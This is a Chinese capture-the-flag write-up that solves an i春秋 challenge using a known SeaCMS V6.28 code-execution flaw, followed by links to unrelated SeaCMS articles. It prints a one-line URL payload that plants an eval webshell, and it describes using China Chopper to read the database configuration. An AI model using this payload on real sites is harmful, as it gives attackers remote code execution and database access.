海洋cms“百度杯”CTF比赛 九月场_Test(海洋cms前台getshell)
题目在i春秋ctf训练营又是一道cms的通用漏洞的题,直接去百度查看通用漏洞这里我使用的是以下这个漏洞:海洋CMS V6.28代码执行0day按照给出的payload,直接访问url+/search.php?searchtype=5&tid=&area=eval($_POST@[1])之后用菜刀连接,但乍一看并没有flag.php
“百度杯”CTF比赛 九月场_Test(海洋cms前台getshell)-1.png
1.png
反手去查了一下海洋cms的数据库配置文件的存放地址:
2.png
出去用菜刀连接数据库
3.png
“百度杯”CTF比赛 九月场_Test(海洋cms前台getshell)-2.png
编辑完成后右键数据库管理,可以看到flag了
4.png
更多文章
-
海洋cms模板标签大全(收藏级)
海洋cms以其免费开源、采集功能强大著称,吸引了越来越影视站长。那么在使用海洋cms过程中,模板标签是必须要掌握的。下面是整理的海洋cms模板标签大全,对于做站朋友,一定有用,赶快收藏起来吧!海洋cms模板标签目录00.相关必要说明 01.全局标签 02.自定义标签 03.if标签和嵌套if标签subif(支持php语句、多e
-
海洋cms模板更换及安装教程
很多刚使用海洋cms站长朋友,不知道如何更换模板及安装,下面就详细的图文教程,快来学习! 第一步,从免费海洋cms模板下载网站(http://www.dongliancnc.com),选择喜好的模板并下载,特别说明都是人工测试过的模板,保证使用哦。 第二步,将模板压缩包,上传文件到网站templets目录下
-
海洋cms为什么我加和的.playon标签无效
为什么我加和的.playon标签无效 我在模板中加入.playo 9_146_0ec63ed33348890.png 在源码中也显示也有 9_146_cd27a087a37315f.png 可是就是没有
-
海洋cms牛牛技术支持特别声明
论坛声明: 本论坛所有发布的源码、程序、代码等可能包括导向第三方网站的链接和引用。对这些链接网站上的内容或者外部网站又导向的任何其它链接网站上的内容,牛牛论坛对于这些网站无法控制,因此也不承担任何责任、技术性售后服务,如需技术性服务可联系在线客服(有偿服务)。牛牛论坛提供这些链接的目的仅是便
-
海洋cms重要通知:关于赞片CMS程序V9、V10版本无法使用的公告
重要通知:关于赞片CMS程序V9、V10版本无法使用的公告 经牛牛论坛技术仔细查询有关代码,赞片CMS程序V9、V10版本确实存在后门代码,请勿网络传播此赞片CMS两个版本程序并立刻删除此赞片CMS程序(仅限于本论坛提供的此V9、V10版本,经其它途径提供下载的版本给站长造成的损失本论